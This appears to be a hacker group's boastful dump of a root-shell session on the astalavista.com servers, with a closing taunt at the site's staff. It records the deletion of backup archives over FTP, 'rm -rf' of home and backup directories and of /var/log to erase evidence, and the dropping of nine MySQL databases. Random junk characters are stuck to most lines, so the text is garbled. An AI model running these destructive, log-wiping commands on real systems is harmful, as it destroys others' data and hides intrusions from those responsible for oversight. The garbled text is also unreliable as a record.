- Q) O6 D- O9 q& S9 g% t, j0 ?% F! i-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
! d7 q# c3 l9 |% @2 Y4 p-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2$ z6 ?8 N: F0 J% N# ~% U
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz24 N$ B, w" G! I: ^1 y0 T
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar* p/ y1 k0 C3 A0 ?3 S
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
0 A6 V7 }" W& O* @3 ~; s[snip]$ |9 Y7 X& ~! P% j" {
226 Transfer complete.
% `7 z; H- K2 T, M C( A# Uftp> mdelete *, X3 u" ?- P/ W _8 `
ftp> ls -la
( O2 B" H$ {0 ?227 Entering Passive Mode (212,254,194,163,2,193)
+ X- Z% |. h/ c+ K150 Opening BINARY mode data connection for ‘file list’.
; P+ u& m/ S: H# n9 Y9 V226 Transfer complete.( j$ j7 O' `8 S, ]0 H( R; s+ Y
ftp>
/ u/ V& ?' m0 r/ o! k- Q; o( v0 }5 `4 k2 m: h: A; p& I
sh-3.2# cd /home1 A" \/ L$ ^4 h, F L
sh-3.2# ls -la) j2 r/ m2 k4 h6 R6 `0 J2 Y
total 120
+ X' ~+ A1 n, b3 P3 K2 L/ zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
; Q3 R7 `$ {) d0 K! Z o9 sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, b. S) a7 k$ H3 Ldrwx–x–x 9 admin admin 4096 Nov 28 2007 admin1 T7 S3 y7 m/ V
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
: Z F x( q/ q) B-rw——- 1 root root 8192 Jun 3 02:45 aquota.user) B6 f, O/ [7 ? ^) A9 [
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet( }' [" d/ ?% G* U: e' d
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup1 K9 b% T; M& {5 h( y4 }2 T1 M
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161# T. F' u; x/ X
drwx–x–x 10 com com 4096 Apr 28 12:40 com& B/ y S' q- K0 y: Z
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
5 K1 V6 j( X( b$ _% ddrwx—— 3 jon jon 4096 Sep 21 2007 jon
4 o5 t! m( ?" g. ^0 `: qdrwx—— 2 root root 16384 Sep 11 2007 lost+found9 I, X3 C3 W' V3 k9 x2 f: y
drwxr-xr-x 2 root root 4096 Sep 14 2007 my% ]; C- E+ B& Q& H
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
+ O& E. c* ~ `drwx—— 2 jon jon 4096 Sep 15 2007 test0 J7 b9 o* J+ Y+ j+ j
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp4 x* `% B# l! y, ?3 E/ g
8 H5 \2 L8 x" W. O+ V% h
sh-3.2# rm -rf backup/
/ C Y7 v: U/ B3 o6 v+ v. @4 ssh-3.2# rm -rf backup.14161/
# Q6 E- Y. F. e! ^sh-3.2# rm -rf ftp/
0 F4 C5 Q* y/ l- I( osh-3.2# rm -rf jon/
; j* L3 k8 L+ t$ F. lsh-3.2# rm -rf my/
! t4 G" f) {8 _6 Ash-3.2# rm -rf mysqldata/+ \' r! {* K$ t; K( ~$ N
sh-3.2# rm -rf test/- K0 C }3 F- N& r4 r3 v
sh-3.2# rm -rf tmp/
( @) T( b; F$ ^0 f- qsh-3.2# cd ~& J6 F& n, W @- J) I$ }$ x
sh-3.2# rm -rf *
) v. |) G% V/ c7 d, F5 _sh-3.2# rm -rf /var/log/( Q( K' d( z+ B% Z% I
rm: cannot remove directory `/var/log//proftpd’: Directory not empty) _4 i" k, k2 e
sh-3.2# rm -rf /home/*; a/ E3 j1 u |( G
sh-3.2# mysql
+ j/ }* z: z8 G' N" E; A2 [Welcome to the MySQL monitor. Commands end with ; or \g.5 W( @ g6 V& Z. D2 p9 u% K
Your MySQL connection id is 407156
' s4 ~) b! d ^$ AServer version: 5.0.45-community-log MySQL Community Edition (GPL)+ [9 U, ?3 k) ]) \" j
" h) Y1 `$ {* i/ s! g
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. B* |1 p' Q4 {* ^4 s$ y }9 Y9 c) w! S+ ~
mysql> show databases;1 x' n) \8 c8 Z* s7 a8 E8 j
+———————–+8 S( }4 v6 n+ i% L) @
| Database |
' V/ g: B2 t0 N2 l, M+———————–+
8 E. q! N6 F0 g- X; ?1 t. R| information_schema |( D7 l0 A- z, x/ p
| astanet_ads |6 p- C$ P) [$ u- |) G
| astanet_mailing_lists |4 M# E% ]# v6 u3 E' R6 g$ X: Y
| astanet_mediawiki |
. O- i7 g2 k6 S! P" W| astanet_membersystem |! g8 j( W. H* z0 @% M% ?6 t
| com_contrexx |0 r" G9 U' A# I
| com_contrexx2 |
9 l T, X3 U+ x| com_contrexx2_live |
2 X3 _9 }# M& k, V# T) k| da_roundcube |8 k! I8 U( ?. M, [4 l# `7 D
| dolphin |
4 D. M6 `/ r0 I$ ]" Y| ideapool |
7 B, Z8 [, j1 W% `* B| mysql |
- R9 M7 A$ _! b) Y; C9 H| test |
( o; D7 `' V1 W, C6 b| yourmaster |: X( ?1 ~& R- F; j
+———————–+( ?/ |$ J* K# _. }7 r. G' d
14 rows in set (0.03 sec)6 ^* `& o* W) g# w+ _1 C) V" G7 m, V
& F5 D1 p$ A3 N- t4 Kmysql> drop database astanet_membersystem;
) C [& [% {* h4 V; NdroQuery OK, 46 rows affected (0.81 sec)
" O* [# E1 N+ }! I/ U
9 ?5 t/ N. a& P% C4 ymysql> drop database com_contrexx;
- S5 L+ h' ~' D sQuery OK, 211 rows affected (2.72 sec)
7 D2 I/ W$ z2 P0 [6 w6 W! l% _# c& ^* H9 y* M' Q' S( h! O
mysql> drop database com_contrexx2;' ]5 U' ]9 ?4 o( N0 i" g; G
Query OK, 237 rows affected (2.23 sec)
- j2 ?* a2 \5 _% e! n/ u" s6 A, ^* F- v# j& Z
mysql> drop database com_contrexx2_live;2 b4 b1 Z9 ~8 ?( F* F( [! \! G. }
Query OK, 227 rows affected (7.63 sec)* V4 Q$ U3 V3 c5 g
1 m7 t+ W* U7 U8 `, S5 ?: ]mysql> drop database ideapool;# B0 u/ n# M6 }, @
Query OK, 69 rows affected (0.19 sec)3 M; `- ]5 [0 l
! g+ B! R% @; E) C* jmysql> drop database yourmaster;/ R) T$ x- H ~; m- i7 e5 r9 x
Query OK, 158 rows affected (0.55 sec)' d+ ]4 o2 T" ~) Y$ i
* G9 N: I6 E% X3 B2 smysql> drop database astanet_ads;9 v5 N+ t' H, S A! m6 S4 q+ g
Query OK, 9 rows affected (0.11 sec)
- e$ s8 ^! C% ^# W9 {4 h1 @% s+ u1 M1 A2 z8 G
mysql> drop database astanet_mailing_lists;
2 f. A |5 O7 oQuery OK, 24 rows affected (1.47 sec)
1 [- }$ X1 F& a7 A/ z5 p
4 `+ C1 R, f. F2 W$ ~mysql> drop database astanet_mediawiki;) \+ a2 N1 |. x& ?
Query OK, 31 rows affected (0.51 sec)
' h0 ?! w5 _. c$ U: c! [* m9 P& D4 k7 A
mysql> show databases;
# Q- k5 }0 l/ E8 V. X+——————–+
5 [- H/ a$ J% P9 v9 ~5 [! S: ^& Q| Database |
3 ^& B; b u7 q, y B+——————–+1 Z0 K/ p! v( k2 l( q5 U
| information_schema |
. S4 |+ ?) ] D, }+ v. Y0 D* o| da_roundcube |
' m# n% k% ^0 o* u| dolphin |
! b8 W( M1 \0 Q2 x+ ?/ [* L( R| mysql |
d( P3 m/ l3 }6 c+ W| test |
2 J Z, k' Z) x+——————–+
v3 W# E8 G0 ]( z, O0 J, Z% y4 I5 rows in set (0.00 sec): D* {2 R# H8 x! I9 [* @
/ w/ `0 E( [5 h j2 \
What a journey! We’re not sure exactly why the “Terminator” had any influence on4 b8 Q% ?9 a$ R$ Y
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
7 V5 H) V* E# U7 w9 Bwrong to say this pack of morons *wont be back*.
1 |" e4 T5 ~# b3 X" l$ J! ~0 T |